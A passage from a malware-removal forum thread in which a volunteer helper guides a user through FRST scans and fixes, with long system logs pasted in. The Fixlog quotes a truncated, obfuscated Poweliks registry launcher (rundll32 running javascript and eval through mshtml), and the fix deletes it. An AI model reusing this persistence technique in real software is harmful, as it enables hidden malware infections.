MSCONFIG\startupreg: SDTray => "C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe"
MSCONFIG\startupreg: Sidebar => C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
MSCONFIG\startupreg: SSBkgdUpdate => "C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
MSCONFIG\startupreg: StartCCC => "C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: T4S2PC => "C:\Windows\twain_32\Dell\Dell2335\Scan2Pc.exe"
MSCONFIG\startupreg: vProt => "C:\Program Files\AVG Secure Search\vprot.exe"
 
==================== Faulty Device Manager Devices =============
 
Name: WAN Miniport (PPPOE)
Description: WAN Miniport (PPPOE)
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: RasPppoe
Problem: : Windows cannot start this hardware device because its configuration information (in the registry) is incomplete or damaged. (Code 19)
Resolution: A registry problem was detected.
 This can occur when more than one service is defined for a device, if there is a failure opening the service subkey, or if the driver name cannot be obtained from the service subkey. Try these options:
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Click "Uninstall", and then click "Scan for hardware changes" to load a usable driver.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/14/2014 07:23:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17280, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17280, time stamp: 0x53f27d67
Exception code: 0xc0000005
Fault offset: 0x00140273
Faulting process id: 0x12b4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (09/14/2014 01:09:25 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0"1".
Dependent Assembly Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (09/14/2014 00:48:15 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0"1".
Dependent Assembly Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (09/13/2014 06:21:34 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0"1".
Dependent Assembly Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (09/13/2014 00:13:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: qbw32.exe, version: 19.0.4014.705, time stamp: 0x4ef315cb
Faulting module name: ole32.dll, version: 6.1.7601.17514, time stamp: 0x4ce7b96f
Exception code: 0xc0000005
Fault offset: 0x0003bc24
Faulting process id: 0x19d8
Faulting application start time: 0xqbw32.exe0
Faulting application path: qbw32.exe1
Faulting module path: qbw32.exe2
Report Id: qbw32.exe3
 
Error: (09/13/2014 00:11:17 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro 2009":
An attempt to LogOff without a logon.
 
Error: (09/13/2014 00:10:32 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks":
Returning NULL QBWinInstance Handle
 
Error: (09/13/2014 00:10:32 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks":
Returning NULL QBWinInstance Handle
 
Error: (09/13/2014 00:10:32 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks":
Returning NULL QBWinInstance Handle
 
Error: (09/13/2014 00:10:32 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks":
Returning NULL QBWinInstance Handle
 
 
System errors:
=============
Error: (09/14/2014 07:03:10 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/13/2014 06:53:54 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 06:47:24 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 06:38:55 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (09/13/2014 06:29:32 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Google Update Service (gupdate) service failed to start due to the following error: 
%%1053
 
Error: (09/13/2014 06:29:31 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Google Update Service (gupdate) service to connect.
 
Error: (09/13/2014 06:28:56 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Microsoft .NET Framework NGEN v4.0.30319_X86 service to connect.
 
Error: (09/13/2014 06:27:34 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (09/13/2014 06:25:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DgiVecp service failed to start due to the following error: 
%%2
 
Error: (09/13/2014 11:37:02 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
 
Microsoft Office Sessions:
=========================
 
==================== Memory info =========================== 
 
Processor: Intel® Pentium® 4 CPU 3.00GHz
Percentage of memory in use: 96%
Total physical RAM: 1022.15 MB
Available physical RAM: 40.21 MB
Total Pagefile: 3043.42 MB
Available Pagefile: 759.45 MB
Total Virtual: 2047.88 MB
Available Virtual: 1924.39 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:465.66 GB) (Free:365.48 GB) NTFS
Drive e: (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[System with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 38953894)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================


#6 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:01 AM

Posted 15 September 2014 - 06:00 AM

Ok, now please run this fix:


Step 1

Please download this attached Attached File  fixlist.txt   350bytes   10 downloads and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Start FRST with administator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#7 mpl006

mpl006
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:08:01 PM

Posted 15 September 2014 - 08:50 PM

The first run of FRST has finished with the fixlist added.  The computer needed to restart after it was finished and is in the process of doing that.  Last time I restarted, it reinfected itself after reboot so hopefully that does not happen this time and we can continue with Step 2 from above.  As soon as I can get logged back in, I will start Step 2.

 

Here is the fixlog.txt:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 12-09-2014
Ran by Dale at 2014-09-15 07:45:34 Run:1
Running from C:\Users\Dale\Desktop
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
CloseProcesses:
HKU\S-1-5-21-941127145-1180520044-1929224469-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
FF DefaultSearchEngine: Conduit Search
FF SelectedSearchEngine: Conduit Search
EmptyTemp:
*****************
 
Processes closed successfully.
"HKU\S-1-5-21-941127145-1180520044-1929224469-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-941127145-1180520044-1929224469-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
Firefox DefaultSearchEngine deleted successfully.
Firefox SelectedSearchEngine deleted successfully.
EmptyTemp: => Removed 1.4 GB temporary data.
 
 
The system needed a reboot. 
 
==== End of Fixlog ====


#8 mpl006

mpl006
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:08:01 PM

Posted 15 September 2014 - 10:10 PM

Here is the new FRST.txt:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 12-09-2014
Ran by Dale (administrator) on DIMENSION-E510 on 15-09-2014 20:57:36
Running from C:\Users\Dale\Desktop
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgcsrvx.exe
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Schneider Electric) C:\Program Files\APC\PowerChute Personal Edition\mainserv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files\Canon\IJPLM\ijplmsvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\VS7DEBUG\mdm.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgui.exe
(Nero AG) C:\Program Files\Common Files\Nero\Nero BackItUp 4\NBService.exe
(Intuit) C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.24.15\GoogleCrashHandler.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgnsx.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(TeamViewer GmbH) C:\Users\Dale\AppData\Local\Temp\TeamViewer\Version9\TeamViewer_Service.exe
(AVG Secure Search) C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe
(Schneider Electric) C:\Program Files\APC\PowerChute Personal Edition\dataserv.exe
() C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(TeamViewer GmbH) C:\Users\Dale\AppData\Local\Temp\TeamViewer\Version9\TeamViewer.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
(TeamViewer GmbH) C:\Users\Dale\AppData\Local\Temp\TeamViewer\Version9\TeamViewer_Desktop.exe
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\AVG2014\avgui.exe [5188112 2014-08-25] (AVG Technologies CZ, s.r.o.)
ShellIconOverlayIdentifiers: GDriveBlacklistedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedEditOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedViewOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncingOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
SearchScopes: HKLM - {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = http://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50aoldesktopie7
SearchScopes: HKCU - {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = http://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50aoldesktopie7
SearchScopes: HKCU - {95B7759C-8C7F-4BF1-B163-73684A933233} URL = http://isearch.avg.com/search?cid={21E441B3-EF26-436F-A6A1-95B7AB175FB8}&mid=a9a15af4a8a247d0815bd15a34568ce3-376f6faec36d28a09c55704a5acf6cec25c189f2&lang=en&ds=AVG&pr=fr&d=2012-03-25 12:31:25&v=15.3.0.11&pid=avg&sg=0&sap=dsp&q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files\AVG\AVG2012\avgssie.dll No File
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: AVG Security Toolbar -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> C:\Program Files\AVG Secure Search\18.1.9.799\AVG Secure Search_toolbar.dll (AVG Secure Search)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Toolbar: HKLM - AVG Security Toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files\AVG Secure Search\18.1.9.799\AVG Secure Search_toolbar.dll (AVG Secure Search)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: intu-help-qb2 - {84D77A00-41B5-4b8b-8ADF-86486D72E749} - C:\Program Files\Intuit\QuickBooks 2009\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG2012\avgpp.dll No File
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\system32\mscoree.dll (Microsoft Corporation)
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 208.180.42.68 208.180.42.100
 
FireFox:
========
FF ProfilePath: C:\Users\Dale\AppData\Roaming\Mozilla\Firefox\Profiles\pyqw91t4.default
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.9\\npsitesafety.dll No File
FF Plugin: @canon.com/EPPEX -> C:\Program Files\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @viewpoint.com/VMP -> C:\Program Files\Viewpoint\Viewpoint Experience Technology\npViewpoint.dll ()
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\avg-secure-search.xml
FF Extension: Firefox Old Version Update Hotfix - C:\Users\Dale\AppData\Roaming\Mozilla\Firefox\Profiles\pyqw91t4.default\Extensions\firefox-hotfix@mozilla.org.xpi [2014-08-22]
FF HKLM\...\Firefox\Extensions: [avg@toolbar] - C:\ProgramData\AVG Secure Search\FireFoxExt\18.1.9.799
FF Extension: AVG Security Toolbar - C:\ProgramData\AVG Secure Search\FireFoxExt\18.1.9.799 [2014-08-25]
 
Chrome: 
=======
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&q={searchTerms}&{google:cursorPosition}sugkey={google:suggestAPIKeyParameter}
CHR CustomProfile: C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-07-06]
CHR Extension: (Google Drive) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-07-06]
CHR Extension: (YouTube) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-07-06]
CHR Extension: (Google Search) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-07-06]
CHR Extension: (AVG Security Toolbar) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2013-07-06]
CHR Extension: (Gmail) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-07-06]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AOL ACS; C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe [46640 2006-10-23] (AOL LLC)
R2 APC Data Service; C:\Program Files\APC\PowerChute Personal Edition\dataserv.exe [21880 2012-01-24] (Schneider Electric)
R2 APC UPS Service; C:\Program Files\APC\PowerChute Personal Edition\mainserv.exe [705912 2012-01-24] (Schneider Electric)
R2 AVGIDSAgent; C:\Program Files\AVG\AVG2014\avgidsagent.exe [3242000 2014-08-25] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2014\avgwdsvc.exe [289328 2014-08-25] (AVG Technologies CZ, s.r.o.)
R2 IJPLMSVC; C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE [138192 2011-02-07] ()
R2 MDM; C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
R2 QBCFMonitorService; C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2011-12-22] (Intuit) [File not signed]
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 TeamViewer9; c:\users\dale\appdata\local\temp\teamviewer\version9\TeamViewer_Service.exe [4382992 2014-09-12] (TeamViewer GmbH)
R2 vToolbarUpdater18.1.9; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [1820184 2014-08-12] (AVG Secure Search)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 Avgdiskx; C:\Windows\System32\DRIVERS\avgdiskx.sys [121624 2014-06-30] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [200984 2014-07-21] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [188696 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\Windows\System32\DRIVERS\avglogx.sys [241944 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [98584 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [27416 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [197400 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx86.sys [42784 2014-08-12] (AVG Technologies)
R3 wanatw; C:\Windows\System32\DRIVERS\wanatw4.sys [33588 2006-11-29] (America Online, Inc.)
S3 catchme; \??\C:\Users\Dale\AppData\Local\Temp\catchme.sys [X]
S2 DgiVecp; \??\C:\Windows\system32\Drivers\DgiVecp.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-15 20:44 - 2014-09-15 20:44 - 04968160 _____ (TeamViewer) C:\Users\Dale\Downloads\TeamViewerQS_en-ckj.exe
2014-09-14 20:11 - 2014-09-14 20:10 - 04859480 _____ () C:\Users\Dale\Desktop\RogueKiller.exe
2014-09-14 19:26 - 2014-09-14 19:42 - 00047150 _____ () C:\Users\Dale\Desktop\Addition.txt
2014-09-14 18:13 - 2014-09-15 07:29 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TeamViewer
2014-09-14 18:12 - 2014-09-14 18:12 - 04691456 _____ (TeamViewer) C:\Users\Dale\Downloads\TeamViewerQS_en.exe
2014-09-13 18:58 - 2014-09-13 18:58 - 00054720 _____ () C:\ComboFix.txt
2014-09-13 12:00 - 2014-09-13 12:00 - 02347384 _____ (ESET) C:\Users\Dale\Downloads\esetsmartinstaller_enu.exe
2014-09-13 11:54 - 2014-09-13 11:54 - 00231760 _____ () C:\Users\Dale\Downloads\CrucialScan.exe
2014-09-13 11:47 - 2014-09-15 20:57 - 00014789 _____ () C:\Users\Dale\Desktop\FRST.txt
2014-09-13 11:47 - 2014-09-15 20:57 - 00000000 ____D () C:\FRST
2014-09-13 10:44 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-09-13 10:44 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-09-13 10:44 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-09-13 10:41 - 2014-09-13 10:41 - 00000000 ____D () C:\Users\Dale\Documents\ProcAlyzer Dumps
2014-09-13 10:19 - 2014-09-13 18:58 - 00000000 ____D () C:\Qoobox
2014-09-13 10:19 - 2014-09-13 11:38 - 00000000 ____D () C:\Windows\erdnt
2014-09-13 10:18 - 2014-09-13 02:20 - 01097728 _____ (Farbar) C:\Users\Dale\Desktop\FRST.exe
2014-09-13 10:18 - 2014-09-13 02:19 - 05577449 ____R (Swearware) C:\Users\Dale\Desktop\ComboFix.exe
2014-09-13 01:38 - 2014-09-13 01:50 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-13 01:34 - 2014-09-13 01:34 - 00001020 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-13 01:34 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-13 01:34 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-13 01:33 - 2014-09-13 01:33 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Dale\Downloads\mbam-setup-2.0.2.1012.exe
2014-09-13 00:33 - 2014-09-13 00:33 - 00007605 _____ () C:\Users\Dale\AppData\Local\Resmon.ResmonCfg
2014-09-12 19:00 - 2014-08-19 12:39 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-09-12 19:00 - 2014-08-18 17:26 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-09-12 19:00 - 2014-08-18 17:08 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-09-12 19:00 - 2014-08-18 16:57 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
